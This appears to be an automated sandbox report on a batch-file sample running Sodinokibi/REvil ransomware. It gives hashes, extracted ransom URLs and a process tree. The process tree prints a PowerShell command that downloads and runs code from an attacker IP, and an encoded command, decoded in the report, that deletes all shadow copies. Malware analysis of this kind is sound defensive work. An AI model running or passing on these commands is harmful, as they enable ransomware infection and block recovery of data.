Analysis

Max time kernel: 88s
Max time network: 100s
Platform: windows10_x64
Resource: win10
Submitted: 18-08-2020 22:10

Static task: static1

Behavioral task: behavioral1
  Sample: 257963fd8d55fc6eb395408d6cd8eb10.bat
  Resource: win7v200722

Behavioral task: behavioral2
  Sample: 257963fd8d55fc6eb395408d6cd8eb10.bat
  Resource: win10
General

Target: 257963fd8d55fc6eb395408d6cd8eb10.bat
Size: 216B
MD5: db422fe5e7b4c0a610a166c2521c5b0b
SHA1: 4df900c107ef17b5d139be2fb8792908a137c1e2
SHA256: 2b9bf7f85b20bc24437ed489cc2b0c2d4ccf0b13baa34e27568ae61d1f67a31f
SHA512: c19beefe11cd9b28d379f33f04061f1a75f52b017cc835997470344c27bb0274a1f555d4f89180183a5168113cd984a682e5db5e1afb5d6fd0eab3e511388f5b
Malware Config

Extracted
  URL: http://185.103.242.78/pastes/257963fd8d55fc6eb395408d6cd8eb10

Extracted
  Path: C:\16t307lqae-readme.txt
  Family: sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FD18DF36649D5926
    http://decryptor.cc/FD18DF36649D5926
Signatures

Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Blacklisted process makes network request (1 IoC)
Processes: powershell.exe
  flow  pid   process
  2     3520  powershell.exe
Modifies extensions of user files (15 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes: powershell.exe
  description                   ioc                                                                                                         process
  File opened for modification  \??\c:\users\admin\pictures\CompressSend.tiff                                                               powershell.exe
  File renamed                  C:\Users\Admin\Pictures\CompressSend.tiff => \??\c:\users\admin\pictures\CompressSend.tiff.16t307lqae       powershell.exe
  File renamed                  C:\Users\Admin\Pictures\RemoveCompress.raw => \??\c:\users\admin\pictures\RemoveCompress.raw.16t307lqae     powershell.exe
  File renamed                  C:\Users\Admin\Pictures\ResetResume.tif => \??\c:\users\admin\pictures\ResetResume.tif.16t307lqae           powershell.exe
  File renamed                  C:\Users\Admin\Pictures\StopUnpublish.tif => \??\c:\users\admin\pictures\StopUnpublish.tif.16t307lqae       powershell.exe
  File opened for modification  \??\c:\users\admin\pictures\UnlockSelect.tiff                                                               powershell.exe
  File renamed                  C:\Users\Admin\Pictures\UnlockSelect.tiff => \??\c:\users\admin\pictures\UnlockSelect.tiff.16t307lqae       powershell.exe
  File opened for modification  \??\c:\users\admin\pictures\NewRevoke.tiff                                                                  powershell.exe
  File renamed                  C:\Users\Admin\Pictures\DenyLock.png => \??\c:\users\admin\pictures\DenyLock.png.16t307lqae                 powershell.exe
  File renamed                  C:\Users\Admin\Pictures\GrantPush.raw => \??\c:\users\admin\pictures\GrantPush.raw.16t307lqae               powershell.exe
  File renamed                  C:\Users\Admin\Pictures\NewRevoke.tiff => \??\c:\users\admin\pictures\NewRevoke.tiff.16t307lqae             powershell.exe
  File renamed                  C:\Users\Admin\Pictures\EditSubmit.raw => \??\c:\users\admin\pictures\EditSubmit.raw.16t307lqae             powershell.exe
  File renamed                  C:\Users\Admin\Pictures\MountUnlock.tif => \??\c:\users\admin\pictures\MountUnlock.tif.16t307lqae           powershell.exe
  File renamed                  C:\Users\Admin\Pictures\TraceGroup.tif => \??\c:\users\admin\pictures\TraceGroup.tif.16t307lqae             powershell.exe
  File renamed                  C:\Users\Admin\Pictures\WaitConvert.raw => \??\c:\users\admin\pictures\WaitConvert.raw.16t307lqae           powershell.exe
Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
  description  ioc                                                                                        process
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                   vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                 vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                        vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer   vssvc.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
  description      ioc                                                                                                                                                          process
  Set value (str)  \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\aa88q71.bmp"   powershell.exe
Drops file in Program Files directory (33 IoCs)
Processes: powershell.exe
Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes: powershell.exe, powershell.exe
  pid   process
  3520  powershell.exe
  3520  powershell.exe
  3520  powershell.exe
  3520  powershell.exe
  3520  powershell.exe
  968   powershell.exe
  968   powershell.exe
  968   powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
  description                      pid   process
  Token: SeDebugPrivilege          3520  powershell.exe
  Token: SeDebugPrivilege          3520  powershell.exe
  Token: SeDebugPrivilege          968   powershell.exe
  Token: SeBackupPrivilege         1284  vssvc.exe
  Token: SeRestorePrivilege        1284  vssvc.exe
  Token: SeAuditPrivilege          1284  vssvc.exe
  Token: SeTakeOwnershipPrivilege  3520  powershell.exe
Suspicious use of WriteProcessMemory (6 IoCs)
Processes: cmd.exe, powershell.exe
  description                       pid   process         target process
  PID 4048 wrote to memory of 3520  4048  cmd.exe         powershell.exe
  PID 4048 wrote to memory of 3520  4048  cmd.exe         powershell.exe
  PID 4048 wrote to memory of 3520  4048  cmd.exe         powershell.exe
  PID 3520 wrote to memory of 968   3520  powershell.exe  powershell.exe
  PID 3520 wrote to memory of 968   3520  powershell.exe  powershell.exe
  PID 3520 wrote to memory of 968   3520  powershell.exe  powershell.exe
Processes

C:\Windows\system32\cmd.exe (PID 4048)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\257963fd8d55fc6eb395408d6cd8eb10.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3520, child of 4048)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/257963fd8d55fc6eb395408d6cd8eb10');Invoke-CXEMWXSCI;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 968, child of 3520)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Note: the -e argument is base64-encoded UTF-16LE and decodes to "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}", i.e. it deletes every volume shadow copy, which is consistent with the vssvc.exe activity recorded below.
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (PID 1284)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken